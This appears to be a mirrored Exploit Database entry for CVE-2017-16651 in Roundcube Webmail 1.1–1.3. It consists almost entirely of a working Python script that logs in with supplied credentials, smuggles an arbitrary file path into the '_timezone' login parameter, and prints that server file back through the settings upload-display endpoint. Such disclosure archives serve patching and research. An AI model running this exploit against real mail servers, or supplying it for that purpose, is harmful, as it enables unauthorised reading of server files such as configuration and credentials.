Roundcube Webmail 1.2 – File Disclosure

• Exploit Database
• 17 阅读

• 作者： stonepresto
  日期： 2021-02-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49510/

• # Exploit Title: Roundcube Webmail 1.2 - File Disclosure 
  # Date: 09-11-2017
  # Exploit Author: stonepresto
  # Vendor Homepage: https://roundcube.net/
  # Software Link: https://sourceforge.net/projects/roundcubemail/files/roundcubemail-beta/1.2-beta/
  # Version: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2
  # Tested on: roundcube version 1.2-beta
  # CVE : CVE-2017-16651
  
  #!/usr/bin/env python3
  # Reference: https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1
  # https://github.com/stonepresto/CVE-2017-16651
  # Exploit Author: stonepresto
  
  import requests
  import re
  import sys
  
  URL="https://127.0.0.1/"
  USER="user@example.com"
  PASS="password"
  
  def main():
  s = requests.Session()
  r = s.get(URL,params={"_task":"login"},verify=False)
  token = None
  for line in r.text.split("\n"):
  if 'name="_token"' in line:
  token = line.split("value=")[1].split('"')[1]
  print("[+] token: %s" % token)
  if token is None:
  print("[!] unable to retrieve token")
  sys.exit(1)
  
  data = {
  "_token":token,
  "_task":"login",
  "_action":"login",
  "_timezone[files][1][path]":sys.argv[1],
  "_url":"_task%3Dlogin",
  "_user":USER,
  "_pass":PASS
  }
  r = s.post(URL,params={"_task":"login"},data=data,verify=False)
  
  params = {
  "_task":"settings",
  "_action":"upload-display",
  "_from":"timezone",
  "_file":"rcmfile1"
  }
  
  r = s.get(URL,params=params,verify=False)
  print(r.text)
  
  if __name__ == "__main__":
  if len(sys.argv) != 2:
  print("[!] Usage: %s <file-to-read>" % sys.argv[0])
  else:
  main()